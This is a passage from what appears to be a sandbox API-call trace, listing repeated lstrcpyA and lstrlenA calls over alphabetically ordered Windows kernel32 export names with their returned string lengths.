(lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.713] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.713] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.713] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.713] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.713] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.713] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.713] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.713] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.713] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.713] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.713] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.713] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.713] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.713] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.713] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.713] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.713] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.714] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.714] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.714] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.714] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.714] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0180.714] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0180.714] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0180.714] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0180.714] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0180.714] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0180.714] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0180.714] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0180.714] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0180.714] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0180.714] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0180.714] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0180.714] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0180.714] lstrlenA (lpString="BEEP") returned 4 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0180.714] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0180.714] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0180.715] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0180.715] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0180.715] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0180.715] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0180.715] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0180.715] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0180.715] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0180.715] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0180.715] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0180.715] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0180.715] lstrlenA (lpString="CANCELIO") returned 8 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0180.715] lstrlenA (lpString="CANCELIOEX") returned 10 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0180.715] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0180.715] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0180.715] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0180.715] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0180.715] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0180.715] lstrlenA (lpString="CHECKELEVATION") returned 14 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0180.715] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0180.715] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0180.716] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0180.716] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0180.716] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0180.716] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0180.716] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0180.716] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0180.716] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0180.716] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0180.716] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0180.716] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0180.716] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0180.716] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0180.716] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0180.716] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0180.716] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0180.716] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0180.716] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0180.716] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0180.716] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0180.716] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0180.717] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0180.717] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0180.717] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0180.717] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0180.717] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0180.717] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0180.717] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0180.717] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0180.717] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0180.717] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0180.717] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0180.717] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0180.717] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0180.717] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0180.717] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0180.717] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0180.717] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0180.717] lstrlenA (lpString="COPYCONTEXT") returned 11 [0180.717] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0180.717] lstrlenA (lpString="COPYFILEA") returned 9 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0180.718] lstrlenA (lpString="COPYFILEEXA") returned 11 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0180.718] lstrlenA (lpString="COPYFILEEXW") returned 11 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0180.718] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0180.718] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0180.718] lstrlenA (lpString="COPYFILEW") returned 9 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0180.718] lstrlenA (lpString="COPYLZFILE") returned 10 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0180.718] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0180.718] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0180.718] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0180.718] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0180.718] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0180.718] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0180.718] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0180.718] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0180.718] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0180.718] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0180.718] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0180.718] lstrlenA (lpString="CREATEEVENTA") returned 12 [0180.718] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0180.719] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0180.719] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0180.719] lstrlenA (lpString="CREATEEVENTW") returned 12 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0180.719] lstrlenA (lpString="CREATEFIBER") returned 11 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0180.719] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0180.719] lstrlenA (lpString="CREATEFILEA") returned 11 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0180.719] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0180.719] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0180.719] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0180.719] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0180.719] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0180.719] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0180.719] lstrlenA (lpString="CREATEFILEW") returned 11 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0180.719] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0180.719] lstrcpyA (in: lpString1=0x36fd0ac, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0180.719] lstrlenA 